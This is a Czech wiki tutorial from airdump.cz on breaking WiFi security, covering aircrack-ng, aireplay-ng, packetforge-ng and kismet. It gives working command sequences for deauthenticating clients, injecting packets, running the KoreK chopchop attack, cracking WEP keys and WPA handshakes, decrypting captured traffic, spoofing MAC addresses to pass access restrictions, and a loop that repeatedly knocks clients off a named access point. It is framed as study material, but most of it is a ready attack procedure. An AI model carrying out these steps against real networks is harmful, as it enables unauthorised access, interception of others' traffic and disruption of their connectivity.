Hacking WiFi sítí

Z WiKi AIRdump.CZ

(Přesměrováno z Útoky na bezdrátové sítě)

Aktualizované a doplněné pokračování původního článku naleznete v textu Hacking WiFi sítí 2011

Český BackTrack, další pentest distribuce a pomůcky

HASHe a wordlisty na prolamování hesel můžete poptávat přímo na portálu airdump.cz stejně jako upravený a počeštěný BackTrack Linux nebo WiFiSlax..

Aircrack CZ lokalizace

Na airdump.cz mimo pentest (hack) operační systémy lokalizujeme i různé aplikace. Posledním počinem je počeštění aircrack-ng. Pokud máte zájem přispět překladem nebo jinak čtěte informace. Na stejném místě můžete jako donate uživatel poptávat i lokalizovaný software..

WiFi Hacking - Crack WEP

. Text Hacking WiFi sítí je studijní materiál - nepopisuje všechny aspekty problematiky, naopak byla snaha popsat co nejvíce technik prolomení zabezpečení bezdrátových sítí. Pro snažší orientaci je doporučeno nastudovat alespoň základ a orientovat se v souvislostech (nástroje, hardware, počítačové sítě). Bezdrátové sítě (standard IEEE 802.11) fungují v rámci referenčného modelu Open Systems Interconnection na dvou vrstvách. Na první fyzické vrstvě vznikají a udržují se fyzické spojení. Podvrstva linkové vrstvy jménem Media Access Control (MAC podvrstva) řídí adresování a kontrolní mechanismy pro přístup k médiu.

Schéma WEP zabezpečení

Teorie zranitelnosti WLAN

Operační systém pro Hacking

Tutoriál Hacking WiFi vznikl na operačním systému Ubuntu 6.06 LTS Dapper Drake, funguje ale i na novější verzi (Ubuntu 6.10, 7.04, 7.10, 8.04, 8.10), stejně tak na dalších linux based operačních systémech BackTrack nebo WiFiSlax. Rozdíl je minimální (zápis příkazů - dle použité verze balíčku aircrack, aircrack-ng). Použita WiFi karta byla Z-Com XI-626, CM9, CB9-Ext. Informace o wifi kartách a chipsetech najdete v článku co umí vaše wifi karata. Konzultovat lze na IRC kanálu. Seznam aplikací: balík aircrack, aircrack-ng, kismet. Ovladače: HostAP + packet injection patch, madwifi a madwifi-ng. Na detaily se můžete ptát v našem fóru. Alternativní postup (pro Windows XP) je popsán v tutoriálu Injekce paketů WIndows XP, event postup pro Windows Vista v diskuzi aircrack + windows vista.

Příprava

Instalace chybějících aplikací

Pokud máte vhodnou wifi kartu a instalované aplikace přeskočte na kapitolu 8 (Začínáme). V operačním systému Ubuntu (na rozdíl od Backtrack nebo Wifislax) nenajdete po instalaci všechny potřebné aplikace. Pro jejich instalaci je nutno upravit sources.list a instalovat (úprava platí pouze pro Ubuntu 6.06). Po instalaci OS je v seznamu (sources.list) k dispozici cca 5 000 balíčku, po úpravě sources.list až 20 000 (proto úprava). Novější Ubuntu (6.10, 7.04, 7.10, 8.04) má k dispozici standardně cca 24 000 balíčků, proto není úprava sources.list nutná. Aircrack a další aplikaci najdete v správě balíčků. Grafický manažer balíčků pro Ubuntu je Synaptic - najdete ve třetím menu Systém. Doisntalujte Kismet, Aircrack popřípadě Aircrack-ng. Závislosti se označí automaticky (to je výhoda manažeru Synaptic). Lze instalovat i nejnovější aplikace z domovské stránky (nevýhoda Synaptic je, že repozitář né vždy obsahuje aktuální verze). Neaktuální verze ale není problém. I když to není na první pohled patrné, určitě budete u pozdější kompilace čehokoliv potřebovat

linux headers
restricted modules
build essential

Patch ovladače HostAP

Postup pro patch ovladačů HostAP je pouze pro uživatele Wi-Fi karty Z-Com na Ubuntu (Backtrack a Wifislax obsahují záplatované ovladače i pro Z-Com karty s čipem Prism 2.5). MadWiFi ovladače pro Wi-Fi karty s čipem Atheros není potřeba v Ubuntu upravovat (testováno na verzích 6.06 a 6.10)! Distribuce Ubuntu 6.06 má ve zdrojích k dispozici ovladače pro Wi-Fi karty s čipsetem Prism 2.5, ty ale neinstalujte, protože ovladač HostAP je potřeba záplatovat v každém Ubuntu. V tutorialu byl použit HostAP verze 0.4.9 a Packet Injection Patch 0.4.7.

Distribuce instalováná z DVD nainstaluje kernel dle procesoru (v případě AMD je to kernel K7, v připade procesoru Intel i386). Injection Patch HostAP ovladačů pod kernelem K7 nefunguje správně nebo vůbec.

Postup pro patchování

Doinstalujeme (pokud není instalováno) hlavičky (headers) a kernel image i386. Nabootujeme do kernelu i386. Karta Z-Com XI-626 (paušálně pod Linuxem) bezi na modulu Orinoco. Zbavíme se modulu příkazem modprobe -r orinoco_pci ; modprobe hostap_pci (jako root).

Následne přidáme do souboru /etc/modprobe.d/blacklist řádek blacklist orinoco_pci, který zabrání znovunačtení modulu po restartu.

Stáhneme a aplikujeme patch:

wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9

wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch

Ve složce /home/user/hostap-driver-0.4.9/driver/modules/ najdeme následující soubory

hostap.c
hostap_cs.c
hostap_plx.c
hostap_pci.c

a v každém z nich odstraníme tyto řádky:

#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
#error Host AP driver was added into Linux 2.6.14.
#error The version used in the kernel tree should be used instead of this
#error external release which is only maintained for old kernel versions.
#endif

Nyní kód zkompilujeme příkazem make.

Nepoužijeme make install ale soubory ručne zkopírujeme. Složku hostap napřed zálohujeme a potom její obsah vymažeme. Potom ze složky /hostap-driver-0.4.9/driver/modules/ tkopirujeme všechny soubory končíci na .ko (mělo by to být 7 souborů) do prádné složky /lib/modules/2.6…-386/kernel/drivers/net/wireless/hostap/

Ve složce /hostap-driver-0.4.9/driver/etc/ najdeme soubor hostap_cs.conf, který zkopírujeme do /etc/pcmcia/.

Po restartu spustíme tyto příkazy:

depmod -a
ifconfig wlan0 down
ifconfig wlan0 up

A otestujeme správnou instalaci příkazem dmesg | grep hostap.

Z-Com firmware

Úprava firmware je možná pouze ve wifi kartách Z-Com! Wifi karta Z-Com (firmware od 1.7.4) se v systému zaregistruje jako rozhraní eth0. Je doporučeno používat (pokud není, tak flashnout) firmware 1.7.4 (né starší ani novější). K otestování vaší verze použijte příkaz

 hostap_diag -p wlan0

Výpis vypadá nějak takhle:

Host AP driver diagnostics information for 'wlan0'
NICID: id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
PRIID: id=0x0015 v1.1.1
STAID: id=0x001f v1.7.4 (station firmware)

Kanal č.14

Pro zprovozneni 14 kanalu na karte Z-Com potrebujeme z karty dump PDA (Production Data Area - něco jako registr karty) a vyeditovat 1 radek . Ignorujte ruzne navody na zmenu stavajiciho PDA za Japonsky a podobne. Staci vyeditovat radek 0x0104 (prepsat 1fff na 3fff) a nahrat firmware nazpatek. Kanal 14 není v Cesku oficialni zalezitost, i presto se najde par exotu na odlehlych mistech :-)

Testujeme Packet injection

Poslední verze suity Aircrack-ng obsahuje Aireplay-ng s volbou -9 - ta otestuje dostupné sítě ve vašem okolí na některou ze zranitelností. V případě kladného výsledku máte jistotu, že vaše ovladače injektují. Ani neuspěch nemusí znamenat automaticky chybu, protože pro získání dat je nutná souhra několika faktorů. Mimo jiné kvalitní signál. V případě, že je signál špatný, nezískate žádne data a test nemůže skončit úspěšně, i když je ovladač a karta v pořádku. Packet injection zajišťuje aplikace z balíku aircrack-ng, jménem aireplay-ng. Není to nic víc, než úspora času. Pro crack WEP klíče ale packet injection není potřeba. Pouze potrebný počet dat (IVs) získate rychleji. Pro orientaci balík Aircrack obsahuje tyto prográmky:

aircrack airodump airmon aireplay airdecap

Aircrack-ng obsahuje:

aircrack-ng airodump-ng airmon-ng aireplay-ng packetforge-ng airtun-ng airserv-ng

Předtím než začnete laborovat, doporučuji sprovoznit (ověřit) packet injection. Šetří to čas a později i stres. Existuji i další možnosti.

Pomocí aplikace Ethereal. Postup: Přepnou wifi kartu do monitor mode příkazem iwconfig nebo airmon. Nápovědu k aplikaci získate pomocí příkazu man nebo help (iwconfig –help).

iwconfig wlan0 mode monitor

nebo

airmon start wlan0

Aplikace iwconfig je součástí Linux Wireless Tools, aplikace airmon jak bylo uvedeno balík aircrack nebo aircrack-ng).

Aircrack-ng zápis pro aktivaci monitor mode je

airmon-ng start wlan0

Program Ethereal (nebo Wireshark) nakonfigurujte tak, aby zobrazoval trafic v realnem čase. pak stačí spustit zachytávaní dat na rozhraní které testujete (wlan0). Pomocí filtru zobrazit pouze deauth paketů. Jeho zápis je:

wlan.fc.type_subtype == 12

Pakety pro zobrazení vygenerujete v konzole příkazem

aireplay -0 5 -a 01:02:03:04:05:06 wlan0

Aircrack-ng zápis:

aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0

Výsledek: V okne Etherealu se objevi 5 deauth paketu s mac signaturou 01:02:03:04:05:06. tato metoda nefunguje 100%. Zejména v případě, že rozhraní používá další aplikace nebo je proveden špatý zápis.

Deuath test. Otestovat packet injection lze i přímo v ostrém provozu, nebo u přípravy na penetrační test. ESSID skrytého Access Pointu je potřeba pro packet injection odhalit (tento parametr vyžaduje starší verze aireplay). No a tu je další možnost jak ověřit ovladače. Kdyz nebude fungovat deauth klienta z AP, na nešifrované síti zřejmě máte smůlu. Relevance výsledku testu je založena na předpokladu, že všechno ostatní je v pořádku. Všechno znamená přesně: Signál (nekvalitní signál = výsledek testu kterému nelze věřit), MAC spoofing v případě nastavené MAC restriction na AP (pokud s váma nebude Access Point komunikovat výsledek testu = automaticky zápor).

Některé pojmy a vychytávky

PWR

Hodnota vyjadřujíci sílu signálu není u všech wifi karet (ovladačů) stejná. Maximální hodnota se hodně liší. Zde je několik max PWR z aplikace Airodump-ng:

miniPCI CM9 [madwifi-ng] PWR 40
PCI Z-Com XI-626 [hostap]  PWR 200
PCI Ralink [rt24xx, 25xx] 200

Monitor mode HostAP

Kartu lze přepnout do monitor mode různě a často se to plete. Zvykněte si na pouze jeden příkaz. Tady jsou tři různe zápisy (se stejným výsledkem): iwconfig wlan0 Mode monitor další je airmon start wlan0 nebo pri ng airmon-ng start wlan0.

Monitor mode madwifi

Novější ovladač madwifi-ng (ovládané pomocí wlanconfig) je dostupný u verze Ubuntu 6.10, 7.04, 7.10, v distribuci Backtrack a WiFiSlax. Ovládání wifi karty tedy záleží od verze ovladače. Novější ovladače používají tkz VAP. Pro ovladače madiwfi existují tyto příkazy monitor mode příkazy

airmon start ath0
airmon-ng start ath0
iwconfig ath0 mode monitor
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Ideální je u madwifi-ng zrušit všechna rozhraní a pak vytvořit nové v monitor modu. Pozor -ng verze již pracuje s virtuálním rozhraním wlan0 a příkazem wlanconfig!

wlanconfig ath0 destroy

wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Vtvořené rozhraní je vypsáno pod příkazem. Ve fóru airdump.cz je popsána a vyřešena chyba kdy se po ukončení VAPu tvoří stále nové rozhraní, s vyšším číslem (ath10, ath11, ath12..)

Poznámky k výkonu wifi karty

Nejduležitější ukazatel je sila signálu. Příliš malá, nebo příliš velká vzdálenost je problém. V prvním případě (saturace) i když máte AP přímo na stole nemusíte detekovat žádný signál. Druhý případ (slabý signál) jasná věc.
Zobrazená PWR je autentická. Hodnota (u karty s chipem Prism) menší než 163 znamená beznaděj :-) Optimum je PWR 167 az 195. [Použitelnost linky je závislá také na spodní hranici šumu]. Hardware a ovladače v rámci chipu Atheros ukazuje intenzitu signalu jinak! PWR 20 až 40 je u karty Atheros v pohodě.
Zaměření nejvhodnějšího směru [polohy] pohybem antény a sledovánim PWR zabere minimum času. Zjištění polarizace je otázkou otočení antény o 90°
Nějaké to deci lze získat regulací výkonu. Standardně je na kartě Z-Com hodnota 198. Změna je možná příkazem:

iwpriv wlan0 writemif 62 130

Po vypnutí karty se nastavení resetuje. Upravením provozní rychlosti lze korigovat packet lost

iwconfig wlan0 rate 1M

Citlivost karty lze upravit příkazem

iwconfig wlan0 sens 3 [1, 2, 3]

Nezapomeňte na pojednání o limitech od ČTU a pokud to není nutné neatakujte stabilní sítě tím, že je budete rušit nadměrně vyzářeným výkonem, zejména pokud používate anténu se širším vyzařovacím uhlem.

Začíname

Airodump

Příkaz pro novější verzi aircrack-ng následuj vždy po příkladu. Spustíme Airodump. Ten do zastavení [ctrl+c] pouze skenuje dostupne site a ukládá data.

airodump wlan0 data 3 1

a uvidíte zhruba to co na obrázku. Pro další krok (generování trafiku) je směrodajné:

Asociovaný klient na Access Pointu
Síla signálu.

Jednotlivé části provedeného příkazu:

3 je číslo kanálu (volitelné)
data je soubor kde se ukladaji data (volitelné)
1 (za trojkou znamena ukladat pouze IVs (volitelné)

Pozor.. Pokud budete ukladát kompletní trafik (bez volby --ivs) souboru data muze „narust“ na 10ky az 100ky MB..

Airodump-ng

Výsledek stejný ale novější verze Airodum-ng zapisuje stejnou věc odlišně.

airodump-ng --ivs -w data --ch 3 wlan0

Pokud se vám povedlo úspěšně spustit Airodump, nechte ho běžet (případně mrkněte na další možnosti aplikace). Pokračovat budeme generováním trafiku.

Příklad pro Airodump-ng

Díky nadefinovné MAC adrese Access Pointu se bude zobrazovat v konzole pouze jediný záznam. Tuto možnost lze použít v případě, že máte v dosahu mraky AP a klienti vám mizí mimo obrazovku.

airodump-ng --bssid 00:60:Bx:xx:xx:xx --ivs -w data --ch 3 wlan0

Nápověda pro aplikace

Kompletní nápovědu k aplikaci lze vyvolat příkazem

airodump-ng --help

nebo

man airodump-ng

Jméno aplikace je volitelné, --help a man funguje v systému Linux pro každou aplikaci.

Aireplay - Asociace na AP

Airodump běží. Těď je potřeba vygenerovat trafik. Není to nutnost, pokud ale nechcete čekat 50 hodin na dostatečné množství IVS čtěte pozorně. Existují 2 možnosti. První (-2 a -3) vyžaduje minimálně jednoho asociovaného klienta na AP a asociaci vaši WiFi karty na AP. Druhá (-4 a -5) funguje i na "prázdnem" AP.

Možnost první - Zaklepeme na vrátka (ještě jednou: pokud používate v aireplay prepínač -2 nebo -3 bez asociace na AP neuděláte zhola nic). V případě, ze je na AP nastavena MAC restrikce asociovat se lze jenom s platnou MAC.

aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0

Aireplay-ng zapis:

aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0

Konsole zobrazí zhruba toto:

Asociace v pripade dostatecneho signalu, znalosti essid funguje na 99%.

Kdyz Airodump nedetekuje zadne asociované klienty na AP znamena to: Spatny signal, spatna doba :-), ad-hoc sit, nebo se jedna o „datove“ AP, na které se bezne nikdo nepripaji a slouzi pouze jako datova linka [pouziva je napr. upc], repeater, [bridge]. Preskočte útok -1 -2 -3 a použijte rovnou útok -4 nebo -5

Aireplay - ARP generujeme data

Na AP vidíte asociovaného klienta, vaše asociace proběhla v pořádku. Tady lze pokračovat. Spustime packet injection pomoci Aireplay -3 (ARP request reply). Za pomoci „opakovani“ se znasobi trafic, pocet WEP paketu, potazmo pocet inicializacnich vektoru :-) Mohl jsem použít i volbu -2 mně ale více vyhovuje -3 proto ji uvádím i v tomto příkladu.

aireplay -3 -b 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx -x 600 wlan0

Aireplay-ng zapis:

 aireplay-ng -3 -b 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx -x 600 wlan0

V okně konzole uvidíte zhruba toto:

Kde

-x 600 je pocet paketu za vterinu (počet ARP requestu se u Aireplay zastavi na cisle 1024).
-3 je (přepínač) aireplay útok
-b je mac adresa access pointu
-h je mac klienta nebo zdroje na který útok směruje

V prvnim okně konsole (beží Airodump) lze kontrolovat progres Jak? Počet jednotek v sloupci data začne rychleji růst, nebo nezačne a pak víte, že vám to nefunguje).

Doba, za jakou Airodump shromáždí dostatek paketu (pro 64bit sifru 80 az 300 000, pro 128bit sifrovani 300 000 az 1 000 000 IVS) záleží na:

Rychlosti sítě
Kvalitě signálu.

Trvat to může 10 minut, hodinu. nebo 3 hoďky.

Tip:

Ideální je asociovat na AP stejnou MAC adresu jakou ma klient ktery (pokud existuje) generuje trafik. Když k tomu přidáte Packet injection, máte 300 000 IVS behem 5 minut.
Aireplay jako i Airodump a Aircrack lze zastavit a znovu spustit.

Aireplay - Deauth, Packet injection, Hidden essid

Detekovane AP ma slusny signal, vidite i asociovane klienty ale AP nevysila ESSID.

Použijeme Aireplay prepínač -0 (Deuath). Ten odpojí dle konfigurace příkazu jednoho nebo všechny klienty na AP.

Deauth to broadcast (všesměr)

aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0

Deauth s definovanou MAC klienta.

aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Aireplay-ng zapis:

aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Konzole zobrazí:

Deauth „odpoji“ klienta (-y) asociovaneho na AP a v první konzole (Airodump) se objeví jméno AP (ESSID). Jak to? Klient u asociace na AP ESSID vyšle a Airodump ho zachytí. Pokud útok funguje je to první prověrka Packet injection (je funkcni). Jako bonus máme jméno AP.

Vysvětlivky:

5 v příkazu znamená počet deauth paketu, ktere odešlete
-0 (nebo taky přepínač nula) je jeden z útoku (Deauth) Aireplay.

Muze se hodit: MDK Ska

KoreK chopchop

Na AP není žádny klient. V Aireplay-ng přepínač -2 a -3 nelze použít. Nevadí. Je jeden hodnej kluk. Provedl vlastní analýzu zranitelnosti a protokolu. O jeho bádaní je rozšířen záběr aplikace Aireplay, nově integruje útok (-4) kterému se dle autora říká KoreK chopchop. Jak to celé funguje?

Stačí dekódovat jeden paket (příklad s použitím platné MAC adresy asociovaného klienta na AP, jako zdroj lze použít i MAC AP)

aireplay -4 -h 00:06:B3:xx:xx:xx wlan0

Odklepl jsem vhodny paket (orientace dle source, destination MAC + nejake data navyše neškodí). Výsledkem je plaintext v souboru .cap a keystream v souboru .xor

S tcpdump zjistime IP..

tcpdump -s 0 -n -e -r replay_dec-1111-220638.cap

a data vlozime do prikazu

arpforge replay_dec-1111-220638.xor 1 00:0E:2x.. 00:60:B3.. 10.10.17.1 10.10.17.215 arp.cap

Údajně správnost IP adresy nehraje žádnou roly. V nové verzi Aircrack-ng suite aplikace arpforge neni. Nahradou za ní je packetforge-ng. Zapis je cca:

packetforge-ng -0 -a 00:0E:2x.. -h 00:60:B3.. -k 10.. -l 10.. -y replay_dec-1..638.xor -w arp.cap

Po ulozeni dat spustime vygenerovaný soubor

aireplay -2 -r arp.cap wlan0

Odklepnout nabidku paketu..

Airodump zachycuje trafik

Cracking WEP

Ve tretim panelu [nebo okne] spustime Aircrack. V pripade, ze je v souboru out.ivs ulozeno vice dat, program je rozlisi dle MAC adresy, ocisluje je a zepta se, s kterou MAC ma pracovat.

aircrack -x out.ivs

Aireplay vygeneruje cca 800 000 paketu, Aircrack se zastavi s hlaskou Attack failed. Possible reasons.. Nic není ztraceno.. Aireplay pokud generuje trafic, muzete nechat ještě chvili bezet. Dobrych paketu není nikdy dost Smile Pak experimentalni no hlavne funkcni..

aircrack -y out.ivs

Po kazdem spusteni Aireplay se vytvori soubor .cap kam se ukladaji pakety z traktovane MAC. Soubor vypada nejak takhle: replay_arp-1105-165417.cap když selze -y u out.ivs zkusime experimentalni bruteforce i u .cap z Aireplay.

aircrack -y replay_arp-1105-165417.cap

Prikazem aircrack –help ziskate prehled moznosti. Aircrack-ng nabizi o něco vice moznosti. S volbou -x se při cracku neprovadi bruteforce poslednich dvou keybytu. Na online crack 128bit sifry vystacite s 900MHz procesorem. V pripade, ze vlastnite slabsi procesor, mene vykonny PC nebo testujete 256 a vice bit sifru, pakety muzete jenom ukladat a crack provest offline, nebo pouzit crack bez grafickeho vystupu -q

aircrack -q -x -b 00:06:B3:XX:XX:XX out.ivs

Pouze alfa-numerické znaky

aircrack -c 00:06:B3:XX:XX:XX out.ivs

Soubor out.ivs je mozno spojit s jinym souborem .ivs, prenest ho na jine PC, nebo pod jiny operacni system.

Na obrazku vidite zaverecnou fazi.

Speciál

Rejects open-system authentication

Na AP ktere neumoznuje open-system auth nelze asociovat. Prikaz:

aireplay-ng -1 0 -e wireless -a 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0

konci hlaskou:

Waiting for beacon frame (BSSID: 00:30:4F:36:04:D0)
Sending Authentication Request
AP rejects open-system authentication
Please specify a PRGA-file (-y).

Lze použít kombinaci experimentálního kódu MDK a Ska. Existuje i podstatne jednodussi cesta. KoreK chopchop a packetforge-ng. Pomoci teto techniky lze prolomit WEP bez asociace na AP :)

aireplay-ng -4 -b 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0

Odtuknout vvyzivnejsi paket..

Read 1094 packets...

       Size: 242, FromDS: 1, ToDS: 0 (WEP)

            BSSID  =  00:60:xx:xx:xx:xx
        Dest. MAC  =  FF:FF:FF:FF:FF:FF
       Source MAC  =  00:61:xx:xx:xx:xx

       0x0000:  0842 0000 ffff ffff ffff 0030 4f36 04d0  .B.........0O6..
       0x0010:  0090 9638 9353 2045 f65e 0100 4a62 0eae  ...8.S E.^..Jb..
       0x0020:  defa 2c0a 049e 2374 46e9 d5c4 d125 38e8  ..,...#tF....%8.
       0x0030:  f20a cf7b ac9e 0b60 4bce d284 5171 3336  ...{...`K...Qq36
       0x0040:  263d e597 13d8 cf9d f8a1 bf4b c3dd 6d92  &=.........K..m.
       0x0050:  cfd8 373e 1464 7cd2 888e 5b0a c6fc 057c  ..7>.d|...[....|
       0x0060:  d490 63eb aa53 37ea dedc 03b6 c9ea f86e  ..c..S7........n
       0x0070:  aefb 895f edc1 ad21 e2a1 8479 7a50 2bd1  ..._...!...yzP+.
       0x0080:  7af1 fca5 dbe5 d7ad bd8e 429b a638 2c1e  z.........B..8,.
       0x0090:  c98c ad3b 6f4a fa5a 623f 5291 59f9 bc50  ...;oJ.Zb?R.Y..P
       0x00a0:  a3f1 cda8 b05d 480e 1036 3745 a7cb 2452  .....]H..67E..$R
       0x00b0:  9054 3e19 b6cd fff4 7719 4193 0178 1665  .T>.....w.A..x.e
       0x00c0:  e4d7 085e 9207 9adb a9fa 5d05 820d fc01  ...^......].....
       0x00d0:  87c5 43e3 32b5 d1f4 4a11 fa8c 410b 2897  ..C.2...J...A.(.
       --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0623-171055.cap

Offset  241 ( 0% done) | xor = 32 | pt = 89 |  517 frames written in  1551ms
Sent 684 packets, current guess: A9...17:11:01  Packets per second adjusted to 375
Offset  240 ( 0% done) | xor = 0C | pt = 5E | 1134 frames written in  3404ms
Sent 408 packets, current guess: 96...17:11:06  Packets per second adjusted to 282
Offset  239 ( 0% done) | xor = B1 | pt = B0 |  431 frames written in  1298ms
Offset  238 ( 1% done) | xor = DF | pt = 46 |  449 frames written in  1794ms
Offset  236 ( 2% done) | xor = 2A | pt = 00 |  530 frames written in  2120ms
Sent 479 packets, current guess: DD...17:11:16  Packets per second adjusted to 212
Offset  235 ( 2% done) | xor = DD | pt = 00 |  490 frames written in  1962ms
Offset   40 (96% done) | xor = 76 | pt = 30 |   21 frames written in   105ms
Sent 5066 packets, current guess: B6...

The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround:  IP header re-creation.

Saving plaintext in replay_dec-3-30.cap
Saving keystream in replay_dec-3-30.xor

Completed in 753s (0.27 bytes/s)

Dalsi krok je vygenerovani "requestu" ktery se ulozi do souboru (PRGA) ktery lze pouziva opakovane. Bude "fungovat" i v pripade, ze na AP zmenite heslo.

packetforge-ng -0 -a MAC -h MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-3-30.xor -w arp-req

Nasleduje:

aireplay-ng -2 -r arp-request eth2

Schromazdeni dat a crack wep klice cca 45 minut.

Zjištění IP, Gateway

IP adresu, DNS, bránu a mnoho dalších užitečných informací lze vyčíst buďto přímo z dat které máme k dispozici nebo pomoci dalších nástroju které umí používat WEP nebo WEP pro dešifrováni trafiku. Mezi tyto nástroje patří rozhodne Wireshark nebo Ettercap. Potrebne udaje muzeme zjistit desifrovanim traficu.

airdecap -b 00:06:B3:XX:XX:XX test.cap

V Airdecap lze pro dešifrování použít WEP klíč i ve formátu HEX

airdecap -w 11A3E229084349BC25D97E2939 test.cap

nebo pouzitim Etherealu s filtrem mac adresy access pointu. TCP provoz mac 00:06:B3:XX:XX:XX: WEP klic jde vlozit i primo do konfigurace Ethereal

wlan.bssid == 00:06:B3:XX:XX:XX (&& TCP)

Pouzivat zjisteny WEP klic umi take Kismet.

wepkey=00:60:B3:XX:XX:XX,6263656869646162

Po spusteni Kismet u Flags uvidime pismeno „W“

vlozime do kismet.conf (cca řádek 154). Nasledne spusteni programu pak odhali IP adresy prirazene jednotlivym MAC. [Seradime site třeba volbou -s [sort] -b [bssid], pak u toho ktereho AP volba -c - zobrazi klienty]

Je libo Matrix? V Kimsetu volba -d zobrazi data která protekaji AP.

Aireplay-ng + CM9 [a,b,g]

Atheros karta se v systemu Linux zaregistruje jako rozhraní ath0. Ovladac madwifi existuje ve verzi old a ng. Pokud funguje starší verze není duvod experimentovat. Ovladani WiFi karty atheros na poslednich ovladačích madwifi-ng je poněkud komplikované. Může zato změna příkazů pro ovládaní.

Zjištění podporovaných frekvencí na kartě (volba 0,1,2,3) příkazem

iwpriv ath0 mode 1

Výpis rozsahu kanálu.

iwlist ath0 chan

Vyjma novych moznosti ve verzi -ng a spusteni samotneho Airodump-ng, lze prikazy z baliku Aircrack pouzivat v baliku Aircrack-ng [t.z airmon, aireplay, aircrack – staci dopsat -ng a pobezi to] Vystup je az na detaily stejny.

airodump-ng --ivs -w data –-ch 6 ath0

..spustí Airodump-ng na kanálu č. 6 a ivs ukláda do souboru data. Soubor naleznete v ceste ve které je aplikace spuštěna (defaultně /home/user).

Pásmo 5 GHz

Airodump-ng scan (pouze) pásma 5GHz (5.1 az 5.8 GHz) lze docílit použitím prepínače --band

airodump-ng --band a --ivs -w data ath0

Airodump-ng v pásmu 5 GHz - pouze kanál 34

airodump-ng --ivs -w data –-ch 34 ath0

Seznam kanálu a frekvencí v pásmu 5GHz

Prolomení WPA zabezpečení

Pro získaní handshake použijte stejný způsob jako u deautentifikace klienta. S reautentifikaci klient opětovně zašle data které airodump-ng zachytí jako tkz. handshake. Příkaz si přizpůsobte dle vlastní potřeby (MAC adresy jsou smyšlené a použijte samozřejmě vlastní). Příkaz pro zapnutí záznamu dat na kanálu číslo 3 a ukládaní do souboru wpa-data.cap je

airodump-ng -b 01:02:03:04:05:06 -w wpa-data --ch 3 wlan0

Příkaz pro odpojení a vynucení reautentifikace klienta. Klient (po odpojení) zašle data které airodump-ng zachyti (tento způsob ale nefunguje 100%).

aireplay-ng -0 5 -a 01:02:03:04:05:06 -c 01:02:03:04:05:07 wlan0

Příkaz pro slovníkový útok je:

aircrack-ng -w password.lst wpa-data.cap

Jak získat handshake alternativní cestou (když selže klasický způsob) pro pozdější crack WPA klíče si můžete přečíst v článku Útoky na WPA sítě. Prolomení WPA lze otestovat na souborech které získate s instalací balíčku Aircrack-ng (naleznete je po instalaci Aircrack-ng ve složce test).

wpa.cap wep.open.system.authentication.cap wep.shared.key.authentication.cap wpa2.eapol.cap password.lst

Nejnovější útok na prolomení WPA zabezpečení za použití hashů a cowpatty je popsán v textu Prolomení WPA.

Připojení do sítě

Konfigurace - Dynamické přidělení IP adresy

Změna módu (pokud karta funguje jinak jako Managed např. jako ad-hoc nebo Master)

iwconfig wlan0 mode managed
dhclient wlan0

Konfigurace - Dynamické přidělení IP adresy + WEP klíč

iwconfig wlan0 essid "wifi" mode Managed key open s:"29reac7BOz9Sbv"

Konfigurace - Pevná IP Ad-Hoc

iwconfig wlan0 mode Ad-Hoc

iwconfig wlan0 channel X

iwconfig wlan0 essid Y

ifconfig wlan0 192.168.0.10 up

Konfigurace - pouze IP adresy

ifconfig wlan0 192.168.0.10 up

Konfigurace - pouze ESSID

iwconfig wlan0 essid Y

Změna MAC adresy

Sled šesti hexadecimálních čísel lze změnit příkazem

ifconfig wlan0 down

ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX

ifconfig wlan0 up

nebo dalším příkazem:

/sbin/ip link set wlan0 addr XX:XX:XX:XX:XX:XX

Linux utilita macchanger dokáže generovat a přirazovat libovolnou MAC.

macchanger -r wlan0

nebo konkrétní MAC

macchanger -m XX:XX:XX:XX:XX:XX

Restart site (jako root)

/etc/init.d/networking restart

Reset IP

ip addr flush dev wlan0

Bonus

Užitečné linky

Lokalizována penetrační distribuce Backtrack Cz.
Hledáni brány, analýza sítě, trafiku, [1] a MITM útok.
Skvělá stránka o WiFi anténach, frekvencích a wi-fi problematice: http://homewifi.wz.cz
Regulace výkonu WiFi karet na chipu Prism na PVwiki
Wi-Fi: Tutoriály na AirDump.Net
Jak provest Hostap Packet Injection Patch Ubuntu Feisty Fawn
Různe příkazy pro Linux.
Pokud dávate přednost OS Windows mrkněte na specifika Windows Konzole.
Flash Intersil Firmware nebo změna MAC WiFi karty na chipu Prism.
Pro další WiFi Hacking nápovědu viz. WiFi Hacking FAQ

Tipy

Než začnete..

Udělejte si dostatek času, čtěte, diskutujte, ptejte se.
Používejte vlastní poznámky (třeba program kNotes)
Každa aplikaceobsahuje manuál (man) nebo nápovědu (help) kterou lze zobrazit v konzole. Příklad pro manuál Aireplay:

man aireplay nebo aireplay --help

Man ukončíte pomocí „q“ Bežíci aplikaci v konzole pomocí „ctrl+c“ Existuje řada užitecných přikazů. Oplatí se číst. Možnosti Linuxu jsou obrovské

while [ "1" ]; do aireplay-ng -1 0 -e ap_franta -a 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0;
sleep 6; aireplay-ng -0 5 -a 00:60:xx:xx:xx:xx eth2; sleep 6; done

Techniky implementovány v aplikaci Aireplay fungují 100% pouze v distribucích Linux. Existuje hack pro Windows XP, je ale nestabilní.
